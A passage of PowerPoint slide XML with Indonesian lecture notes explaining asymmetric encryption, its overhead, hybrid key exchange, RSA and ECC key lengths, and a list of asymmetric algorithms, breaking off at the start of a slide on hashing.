              <a:t>telah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengintip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mereka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mencegat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> dan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>Akan </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetapi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, Mallory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mendekripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>pesan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tersebut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sehingga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sistem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tetap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>aman</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Kekurangan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dari</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>adalah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bahwa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melibatkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> overhead </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>komputasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dibandingkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Ketika </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sejumlah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dienkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> pada disk </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>atau</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>diangkut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>melalui</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>jaringan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tidak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>efisien</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Daripada</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>besar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>secara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>langsung</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sandi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>publik</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>digunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mengenkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rahasia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>simetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>. Hal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>memungkinkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Alice dan Bob </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>bertukar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>sesi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>massal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>tanpa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> Mallory </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>mempelajarinya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>Nb. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Enkripsi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diimplementasikan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>beberapa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>Setiap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>memiliki</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>panjang</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>berbeda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Sandi </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> Rivest, Shamir, Adelman (RSA) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>membutuhkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>privat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> 2.048-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>diterima</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t>. Elliptic Curve Cryptography (ECC) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>asimetris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dapat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>menggunakan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>pribadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> 256-bit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>untuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>mencapai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>tingkat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>keamanan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> yang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>setara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>dengan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0" err="1"/>
              <a:t>kunci</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" i="1" dirty="0"/>
              <a:t> RSA 3,072-bit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>Ringkasnya</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0" err="1"/>
              <a:t>algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="0" dirty="0"/>
              <a:t> asymmetric:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>RSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>DSA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>Diffie–Hellman (DH)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>ECC (ECDSA, ECDH, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>dll</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>ElGamal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450">
              <a:buFontTx/>
              <a:buChar char="-"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0" err="1"/>
              <a:t>Implementasi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" b="1" dirty="0"/>
              <a:t>: PGP/GPG, TLS certificates, SSH keys</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-ID"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37906204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Hashing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>Algoritma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> hashing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>kriptografi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>menghasilkan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0" err="1"/>
              <a:t>rangkaian</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0"/>
              <a:t> bit </a:t>
            </a:r>
            <a:r>
